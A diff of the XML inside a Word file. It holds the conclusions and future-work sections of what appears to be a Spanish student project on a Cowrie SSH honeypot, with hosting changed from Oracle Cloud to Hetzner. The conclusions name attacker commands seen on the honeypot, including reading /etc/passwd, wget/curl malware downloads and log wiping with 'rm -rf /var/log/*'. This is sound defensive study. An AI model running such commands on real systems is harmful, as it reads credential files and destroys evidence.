-        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
+        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23534,15 +23874,221 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
+        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. Desde el momento en que el puerto 22 queda accesible, los intentos de fuerza bruta comienzan en cuestión de minutos, procedentes de IPs distribuidas por todo el mundo. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El análisis de los datos capturados revela patrones consistentes con la literatura especializada y los informes de los principales CERT europeos: predominio de credenciales triviales (root/123456, admin/admin, test/test), ejecución sistemática de comandos de reconocimiento (uname -a, cat /etc/passwd, whoami, id) seguida de intentos de descarga de malware mediante wget y curl, y borrado de huellas (history -c, rm -rf /var/log/*). Este comportamiento secuencial y altamente estandarizado confirma que la inmensa mayoría de los ataques los ejecutan scripts automatizados, no operadores humanos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK confirma que la actividad observada abarca múltiples tácticas: desde el Acceso Inicial (T1110 – Brute Force) hasta la Evasión de Defensas (T1070 – Indicator Removal on Host), pasando por Ejecución (T1059 – Command and Scripting Interpreter), Descubrimiento (T1082 – System Information Discovery) y Comando y Control. La mayoría de las técnicas observadas se corresponden con las fases tempranas de la cadena de ataque (kill chain), lo que es coherente con el perfil de los atacantes: bots que buscan acceso rápido para el despliegue de criptomineros, la incorporación del servidor a una botnet o el lanzamiento de ataques secundarios.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23563,217 +24109,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. Desde el momento en que el puerto 22 queda accesible, los intentos de fuerza bruta comienzan en cuestión de minutos, procedentes de IPs distribuidas por todo el mundo. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El análisis de los datos capturados revela patrones consistentes con la literatura especializada y los informes de los principales CERT europeos: predominio de credenciales triviales (root/123456, admin/admin, test/test), ejecución sistemática de comandos de reconocimiento (uname -a, cat /etc/passwd, whoami, id) seguida de intentos de descarga de malware mediante wget y curl, y borrado de huellas (history -c, rm -rf /var/log/*). Este comportamiento secuencial y altamente estandarizado confirma que la inmensa mayoría de los ataques los ejecutan scripts automatizados, no operadores humanos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK confirma que la actividad observada abarca múltiples tácticas: desde el Acceso Inicial (T1110 – Brute Force) hasta la Evasión de Defensas (T1070 – Indicator Removal on Host), pasando por Ejecución (T1059 – Command and Scripting Interpreter), Descubrimiento (T1082 – System Information Discovery) y Comando y Control. La mayoría de las técnicas observadas se corresponden con las fases tempranas de la cadena de ataque (kill chain), lo que es coherente con el perfil de los atacantes: bots que buscan acceso rápido para el despliegue de criptomineros, la incorporación del servidor a una botnet o el lanzamiento de ataques secundarios.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con coste cero en software y hardware, utilizando exclusivamente herramientas de código abierto y el tier gratuito de Oracle Cloud. La instancia A1.Flex (1 OCPU ARM, 6 GB RAM) ha resultado más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La combinación de security lists (OCI), firewall del host (iptables) y redirección NAT proporciona tres capas de protección que garantizan la seguridad del SSH de administración real. En ningún momento durante el proyecto el puerto 2022 ha recibido tráfico hostil, lo que valida la efectividad de la separación entre el honeypot y el servicio real. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
+        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23794,15 +24138,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">despliegue de instancias, configuración de redes virtuales, gestión de security lists y conexión remota en Oracle Cloud Infrastructure.</w:t>
+        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23823,15 +24167,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables, Security Lists de OCI), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
+        <w:t xml:space="preserve">Scripting y automatización: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23852,15 +24196,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Scripting y automatización: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
+        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23881,15 +24225,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
+        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23910,35 +24254,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:left="720" w:hanging="357"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve">Documentación técnica: </w:t>
       </w:r>
       <w:r>
@@ -23985,6 +24300,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -24034,12 +24350,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El principal aprendizaje ha sido comprobar que la ciberseguridad defensiva no requiere necesariamente herramientas costosas ni infraestructura compleja. Con software libre, una cuenta cloud gratuita y conocimientos de scripting es posible construir un sistema de inteligencia de amenazas que produce resultados comparables a los de soluciones comerciales. Esta democratización de la ciberseguridad es especialmente relevante para pequeñas organizaciones que no disponen de presupuesto para soluciones enterprise pero que igualmente necesitan comprender las amenazas que enfrentan.</w:t>
+        <w:t xml:space="preserve">El principal aprendizaje ha sido comprobar que la ciberseguridad defensiva no requiere necesariamente herramientas costosas ni infraestructura compleja. Con software libre, un servidor cloud de pocos euros al mes y conocimientos de scripting es posible construir un sistema de inteligencia de amenazas que produce resultados comparables a los de soluciones comerciales. Esta democratización de la ciberseguridad es especialmente relevante para pequeñas organizaciones que no disponen de presupuesto para soluciones enterprise pero que igualmente necesitan comprender las amenazas que enfrentan.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -24165,7 +24482,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Infraestructura cloud del honeypot.</w:t>
+        <w:t xml:space="preserve">Plataforma cloud del honeypot: servidores y cortafuegos.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24179,7 +24496,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Oracle Corporation. (s. f.). Oracle Cloud Free Tier. https://www.oracle.com/cloud/free/</w:t>
+        <w:t xml:space="preserve">Hetzner Online GmbH. (s. f.). Hetzner Cloud. https://www.hetzner.com/cloud/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24197,7 +24514,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">SDK utilizado por el script de aprovisionamiento oci_a1_retry.py.</w:t>
+        <w:t xml:space="preserve">Verificación de cuentas nuevas en la plataforma cloud.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24211,7 +24528,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
